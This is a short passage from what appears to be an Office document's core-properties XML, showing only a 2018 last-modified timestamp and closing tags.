  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-05T05:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>